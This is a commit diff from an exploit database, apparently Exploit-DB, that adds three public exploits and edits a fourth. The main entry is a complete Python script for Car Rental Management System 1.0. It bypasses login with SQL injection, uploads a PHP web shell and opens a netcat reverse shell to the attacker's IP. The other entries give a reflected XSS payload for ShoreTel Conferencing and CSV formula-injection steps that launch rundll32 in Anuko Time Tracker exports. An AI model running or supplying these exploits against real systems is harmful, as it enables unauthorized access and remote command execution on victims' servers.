DB: 2020-11-11

4 changes to exploits/shellcodes Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection
2020-11-11 05:01:56 +00:00 · 2020-11-11 05:01:56 +00:00 · 3774170267
commit 3774170267
parent e797f5230d
5 changed files with 145 additions and 7 deletions
--- a/exploits/php/webapps/49025.py
+++ b/exploits/php/webapps/49025.py
@ -0,0 +1,87 @@
+# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
+# Date: 09-11-2020
+# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Debian 10 with apache2
+
+# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
+# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
+# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
+# on the victim system
+#
+# on the Attacker machine you must listen with NC on a port
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+#foxlox#
+
+
+
+payload = {"username":"' OR 1=1 limit 1#","password":"moana"}
+
+proxies = { "http": "http://localhost:8080"}
+
+#payload = "username=' OR 1=1 limit 1 #&password=ciao"
+
+def deb(str):
+    print("Debug => "+str)
+
+def login():
+    deb("Login...")
+    session=requests.Session()
+    url = mainurl+"/admin/ajax.php?action=login"
+    #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
+    r=session.post(url,payload, allow_redirects=False,proxies=proxies)
+    cookie = r.headers["Set-Cookie"]
+    deb(cookie)
+    return cookie
+
+def find_all(a_str, sub,lbegin,lend):
+    start = 0
+    start = a_str.find(sub, start)
+    t=(a_str[start+lbegin:start+lend]).replace('"','')
+    return t
+
+
+def upload(c):
+    deb("Getting cookie")
+    c = c.split("=");cookie={c[0]:c[1]}
+    deb("Sending payload")
+    filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')}
+    fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
+    r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
+    deb("Saved Machine");
+    r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
+    mid=find_all(r.content,'data-id=',8,11)
+    deb("Machine id: "+mid)
+    r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
+    defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
+    deb("Exploit url: "+defurl)
+    #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
+    exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
+    print("Opening url: "+exploit)
+    print("Don't forget to run: nc -nvlp "+sys.argv[3])
+    os.system(exploit)
+
+
+def usage():
+    if len(sys.argv) < 4:
+        print("Create a PHPShell for Car Rental Management System")
+        print("example:")
+        print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
+        exit()
+
+
+    
+usage()
+mainurl = sys.argv[1]
+upload(login())
+
+#fox
--- a/exploits/php/webapps/49026.txt
+++ b/exploits/php/webapps/49026.txt
@ -0,0 +1,23 @@
+# Exploit Title: ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting
+# Date: 11/8/2020
+# Exploit Author: Joe Helle
+# Vendor Homepage: https://www.mitel.com/articles/what-happened-shoretel-products
+# Version: 19.46.1802.0
+# Tested on: Linux
+# CVE: 2020-28351
+
+PoC:
+
+The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could
+allow an unauthenticated attacker to conduct a reflected cross-site
+scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient
+validation for the time_zone object in the HOME_MEETING& page.
+
+Vulnerable payload
+/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME
+
+Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown
+object is located. Upon executing the payload, the exploit executes when
+the mouse is rolled over the dropdown menu object.
+
+https://github.com/dievus/CVE-2020-28351
--- a/exploits/php/webapps/49027.txt
+++ b/exploits/php/webapps/49027.txt
@ -0,0 +1,25 @@
+# Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection
+# Date: 2020-10-17
+# Exploit Author: Mufaddal Masalawala
+# Vendor Homepage: https://www.anuko.com/ <https://berrnd.de/>
+# Software Link: https://www.anuko.com/time-tracker/index.htm
+# Version: 1.19.23.5325
+# Tested on: Kali Linux 2020.3
+# CVE: CVE-2020-15255
+# Proof Of Concept:
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and
+Note data field that is mistreated while exporting to a CSV file.
+To exploit this vulnerability:
+
+   1. Login to the application, goto 'User' module and edit the user
+   2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the
+   'Name' field
+   3. Goto 'Project' module, add a new project with the same malicious
+   payload in the 'Name' field
+   4. Goto 'Time' module, select our created User, Project and again enter
+   the same payload in 'Note' field
+   5. Enter the rest of the details and click 'Submit'
+   6. Now goto 'Reports' click Generateand download the CSV file
+   7. Open the CSV file, allow all popups and our payload is executed
+   (calculator is opened).
--- a/exploits/windows/remote/48657.py
+++ b/exploits/windows/remote/48657.py
@ -149,7 +149,7 @@ xml_schema = """
    </xs:unique>
  </xs:element>
 </xs:schema>
-""".replace("<", "&#60;").replace(">", "&#62;").replace('"', "&#34;").strip()
+""".replace("<", "&lt;").replace(">", "&gt;").replace('"', "&#34;").strip()
 # endregion

 # region xml_diffgram
@ -234,16 +234,16 @@ config = """
 def prepare_update_config(uuid, cmd):
    config_payload = config
    config_payload = config_payload.replace('{CMD}', cmd)
-    config_payload = config_payload.replace('<', '<')
-    config_payload = config_payload.replace('>', '>')
+    config_payload = config_payload.replace('<', '&lt;')
+    config_payload = config_payload.replace('>', '&gt;')

    diffgram_payload = xml_diffgram
    diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
    diffgram_payload = diffgram_payload.replace('{ID}', uuid)
-    diffgram_payload = diffgram_payload.replace('&', '&')
-    diffgram_payload = diffgram_payload.replace('<', '<')
-    diffgram_payload = diffgram_payload.replace('>', '>')
-    diffgram_payload = diffgram_payload.replace('"', '"')
+    diffgram_payload = diffgram_payload.replace('&', '&#38;')
+    diffgram_payload = diffgram_payload.replace('<', '&#60;')
+    diffgram_payload = diffgram_payload.replace('>', '&#62;')
+    diffgram_payload = diffgram_payload.replace('"', '&#34;')

    payload = update_config
    payload = payload.replace('{XMLSCHEMA}', xml_schema)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40842,6 +40842,9 @@ id,file,description,date,author,type,platform,port
 49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware,
 49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php,
 49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple,
+49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,
+49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php,
+49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,